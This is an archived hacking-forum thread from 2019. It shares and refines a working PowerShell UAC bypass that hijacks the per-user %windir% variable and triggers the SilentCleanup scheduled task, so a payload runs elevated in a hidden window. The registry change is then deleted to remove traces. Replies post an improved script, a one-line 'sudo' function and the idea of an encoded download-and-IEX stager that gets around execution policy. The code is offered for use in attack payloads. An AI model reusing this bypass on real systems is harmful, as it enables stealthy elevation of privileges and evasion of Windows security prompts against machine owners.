lokiuox Posted February 24, 2019 Share Posted February 24, 2019 Hi everyone! First of all, sorry if my English is not that good, It's not my main language. I just signed up to the forum to post this, after watching the video Darren made about a payload that changes the Desktop background. I had this idea after he mentioned that the Lockscreen background could not be changed due to the fact that there isn't a "stable" method and it needed admin privileges. So I made a script which, when opened as standard user, respawns itself in a hidden window with full admin privileges and executes whatever payload you put in it. Here it is: if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { #Payload goes here #It'll run as Administrator } else { $registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-ItemProperty -Path $registryPath -Name $name -Value $Value #Depending on the performance of the machine, some sleep time may be required before or after schtasks schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null Remove-ItemProperty -Path $registryPath -Name $name } Explanation: There's a task in Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe Since it runs as Users, and we can control user's environment variables, we can change %windir% (normally pointing to C:\Windows) to point to whatever we want, and it'll run as admin. The first line if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) basically checks if we are admin, so that the script can detect whether it has been called by the user or by the task, and do stuff accordingly. Everything that need admin privs goes in this block of the if statement, while in the "else" block goes what can be run as standard user, including the bypass itself. The "Set-ItemProperty" line creates a new Registry Key "HKCU:\Environment\windir" in order to change the %windir% variable value to the command we want to be run as admin, in this case powershell -ep bypass -w h $PSCommandPath;# "$PSCommandPath" evaluates to our script path, "-ep bypass" is equal to "-ExecutionPolicy bypass" and "-w h" to "-WindowStyle hidden". The ";#" part is needed to comment out the rest of the path of the task from the command. So, in the end, the task's execution path evaluates to: powershell -ExecutionPolicy bypass -WindowStyle hidden <path of the script> ;#\System32\cleanmgr.exe The "schtasks" command will simply ask Windows to run the task with the now modified %windir% and "Remove-ItemProperty" will just delete the reg key after the task has been executed in order to not break other things and/or leave traces of the "attack". When the task runs, it will call the script with full fledged admin privs, so now the first block of the if statement is executed and our payload can do whatever we want. Note: In order to work, the code must be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog. However, if our payload is small enough to fit entirely in the %windir% variable, we can reduce the whole script to just the three fundamental lines, i.e. "Set-ItemProperty", "schtasks" and "Remove-ItemProperty". (Idk if it can fit in the run dialog though) Note2: I think it could break if the the script is in a path that contains spaces, but I think it's easily fixable by escaping the $PSCommandPath in the $Value variable Link to comment Share on other sites More sharing options...
Shadowharvy Posted March 14, 2019 Share Posted March 14, 2019 I am going to steal this and pay with it. It gives me some horribly wonderful ideas. Would it be able to launch another powershell script? I am new to learning powershell myself Link to comment Share on other sites More sharing options...
Adriano Posted March 14, 2019 Share Posted March 14, 2019 The idea is nice but the problem with this implementation is that by default, powershell scripts are not allowed to run. One would have to circumvent it, which is not difficult to do, or even better, get to the same result using another approach (vbscript or even a bat?). I think it worked with Darren because his powershell already has Execution Policies level to either Unrestricted or Bypass, but he did it using an administrative account the first time. I will try to work on this and bypass this "security" mechanism. Here is what happens if you run on a machine that has the default setting: .\Downloads\uac-bypass.ps1 : File C:\Users\user\Downloads\uac-bypass.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170. At line:1 char:1 + .\Downloads\uac-bypass.ps1 + ~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : SecurityError: (:) [], PSSecurityException + FullyQualifiedErrorId : UnauthorizedAccess Link to comment Share on other sites More sharing options...
Shadowharvy Posted March 14, 2019 Share Posted March 14, 2019 When you load it it will be like powerShell -windowstyle hidden -ExecutionPolicy Bypass C:\Users\user\Downloads\uac-bypass.ps1 i can post the short hand when I get home in 9 hours. But at work and don't have my spare bb with me Link to comment Share on other sites More sharing options...
Adriano Posted March 14, 2019 Share Posted March 14, 2019 I did make it work that way. Actually I ran: powershell -ep bypass which gave me a new shell ready to run the script. But when I ran I realized: SilentCleanup task runs as "Users" and not administrator I realized the script goes into loop, because the user is never a member of group "S-1-5-32-544" so it recursively calls itself. I changed value of windir to "powershell -ep bypass -Command mkdir c:\windows\uac-bypass;pause;#" so I could pause and see what was going on. it Said: Quote mkdir : Access to the path 'uac-bypass' is denied. At line:1 char:1 + mkdir c:\windows\uac-bypass;pause;#\system32\cleanmgr.exe /autoclean /d 😄 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (C:\windows\uac-bypass:String) [New-Item], UnauthorizedAccessException + FullyQualifiedErrorId : CreateDirectoryUnauthorizedAccessError,Microsoft.PowerShell.Commands.NewItemCommand That seems to have correctly ran what I wanted mkdir and a pause, the rest was ignored, but still it seems it doesn't have permissions. Am I missing something here? Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted March 14, 2019 Share Posted March 14, 2019 Yeah, I seen enigma post something about this. Surprised it hasn't made it into Empire yet. I am refactoring this thing and making it into a reusable script. It will take an encoded command or a file path. It might be done before I go out of town this weekend. We will see. Link to comment Share on other sites More sharing options...
lokiuox Posted March 14, 2019 Author Share Posted March 14, 2019 6 hours ago, Adriano said: I did make it work that way. Actually I ran: powershell -ep bypass which gave me a new shell ready to run the script. But when I ran I realized: SilentCleanup task runs as "Users" and not administrator I realized the script goes into loop, because the user is never a member of group "S-1-5-32-544" so it recursively calls itself. I changed value of windir to "powershell -ep bypass -Command mkdir c:\windows\uac-bypass;pause;#" so I could pause and see what was going on. it Said: That seems to have correctly ran what I wanted mkdir and a pause, the rest was ignored, but still it seems it doesn't have permissions. Am I missing something here? The task should run with elevated privileges by default, I tested your command on my machine and it works. Maybe it requires a user which is part of the Administrators group? I'll test it with a limited user and let you know. 3 hours ago, PoSHMagiC0de said: Yeah, I seen enigma post something about this. Surprised it hasn't made it into Empire yet. I am refactoring this thing and making it into a reusable script. It will take an encoded command or a file path. It might be done before I go out of town this weekend. We will see. It would be great 🙂 Obviously what I posted isn't refined, it's just a POC, I figured people will adapt it to their needs since it can be used in a variety of ways. Link to comment Share on other sites More sharing options...
lokiuox Posted March 14, 2019 Author Share Posted March 14, 2019 6 hours ago, Adriano said: I did make it work that way. Actually I ran: powershell -ep bypass which gave me a new shell ready to run the script. But when I ran I realized: Oh btw, you can just run this, you don't have to open a new shell entirely. This works even in the Run dialog (obviously you have to adjust the path to the script) powershell -ep bypass .\script.ps1 (Sorry for the double comment, I haven't figured out how to edit comments yet. lol) Link to comment Share on other sites More sharing options...
SilicaAndPina Posted March 14, 2019 Share Posted March 14, 2019 Doesnt work on Windows 7 schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null returns "Cannot find the file specified" hm Link to comment Share on other sites More sharing options...
zombo611 Posted March 14, 2019 Share Posted March 14, 2019 Just a thought about running on systems that block .ps1 files. In some cases you can open the powershell_ise.exe paste the script and hit F5 to run. Link to comment Share on other sites More sharing options...
brianzimm Posted March 14, 2019 Share Posted March 14, 2019 ## Use powershell -ep byppass .\script.ps1 to launch ## ## Fixed an issue where if there are spaces in the script path. ## ## Added option for interactive window, comment out the code to change back to hidden ## ## Current example below opens and Admin powershell window ## if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { #Payload goes here #It'll run as Administrator powershell.exe } else { $registryPath = "HKCU:\Environment" $Name = "windir" #Use for hidden window #$Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#" #Use for interactive window $Value = "powershell -ExecutionPolicy bypass -Command `"& `'$PSCommandPath`'`";#" Set-ItemProperty -Path $registryPath -Name $name -Value $Value #Depending on the performance of the machine, some sleep time may be required before or after schtasks schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null Remove-ItemProperty -Path $registryPath -Name $name } Fixed an issue with spaces in the script path. Link to comment Share on other sites More sharing options...
SilicaAndPina Posted March 14, 2019 Share Posted March 14, 2019 Also worth noting. this doesnt work unless your account is allready an admin, if your say a standard user and the administrator has a password this wont work.. but it will bypass UAC if your current user IS an administrator account Link to comment Share on other sites More sharing options...
lordnikkon Posted March 14, 2019 Share Posted March 14, 2019 1 hour ago, SilicaAndPina said: Also worth noting. this doesnt work unless your account is allready an admin, if your say a standard user and the administrator has a password this wont work.. but it will bypass UAC if your current user IS an administrator account You may be right. I think the script is just for educational purposes. Link to comment Share on other sites More sharing options...
Pinnacle Network Posted March 14, 2019 Share Posted March 14, 2019 why cant you just Set-ExecutionPolicy Bypass Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted March 14, 2019 Share Posted March 14, 2019 Here you go, new version. @Darren Kitchen @lokiuox https://github.com/PoSHMagiC0de/Invoke-TaskCleanerBypass It uses dynamic parameters and can take in the standard posh base64 encoded commands or a file location of your script. As far as the bypass thing. Just run it as an encoded command. Better yet, here is a good way to launch it. 😛 Just create a encoded stager to downloadstring the bypass script from web server and execute with "Invoke-Expression" IEX for short with the command. You probably can take this function, add after it the command to run it with your parameters and encode the whole thing to run. No bypass to execution policy needed. Anyway, look at the script. Some modifications were needed to the reg hack. I needed to use cmd /c in front so I could escape the appended stuff that gets added when ran like the cleaner command. That was breaking the exploit. So the new reg entry is cmd /c yourpayload & :: That runs the command and then rems out whatever else is there. SQL injection for registries. 😛 Since I won the competition this month so I am not payloading this. Someone else can run with this and create a BB payload. I know a few ways to use it but someone else can have a turn. FYI: It checks if you have Win10, member of local admins and already UAC bypassed. Will run if bypassed, will do nothing if not on 10 or greater and/or not a local admin. Link to comment Share on other sites More sharing options...
Dr.Chi Posted March 14, 2019 Share Posted March 14, 2019 So just to clarify, all this is doing is just bypassing the UAC popup right? It's not priv esc since you have to be Admin to run it in the first place. Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted March 14, 2019 Share Posted March 14, 2019 I have seen UAC bypasses put into the privesc category but as far a privesc from an unprivileged user like a normal user to admin it is not. It is sort of a privesc since until you bypass UAC you really do not have any admin functions. Update, per request from a Youtube user, I added in the ability for this to run on Windows 8.1. Does it work on 8.1? Have no idea but he says it does. 😛 Link to comment Share on other sites More sharing options...
Adriano Posted March 15, 2019 Share Posted March 15, 2019 3 hours ago, PoSHMagiC0de said: I have seen UAC bypasses put into the privesc category but as far a privesc from an unprivileged user like a normal user to admin it is not. It is sort of a privesc since until you bypass UAC you really do not have any admin functions. Update, per request from a Youtube user, I added in the ability for this to run on Windows 8.1. Does it work on 8.1? Have no idea but he says it does. 😛 I can't say there are two types of privesc. It's just misleading to say so. As for does it work on 8.1, yes... the original one works on 8.1, that's the one I tested. Link to comment Share on other sites More sharing options...
Adriano Posted March 15, 2019 Share Posted March 15, 2019 5 hours ago, Dr.Chi said: So just to clarify, all this is doing is just bypassing the UAC popup right? It's not priv esc since you have to be Admin to run it in the first place. yeah, such a bummer. Link to comment Share on other sites More sharing options...
Shadowharvy Posted March 15, 2019 Share Posted March 15, 2019 It's still a lot more discreet then letting the pop-up load then type alt+y or alt+j. Link to comment Share on other sites More sharing options...
Yves Rosius Posted March 15, 2019 Share Posted March 15, 2019 function sudo { $command = "powershell -noexit " + $args + ";#"; Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value $command ; schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I; Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir" } Quick function that works like sudo 🙂 Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.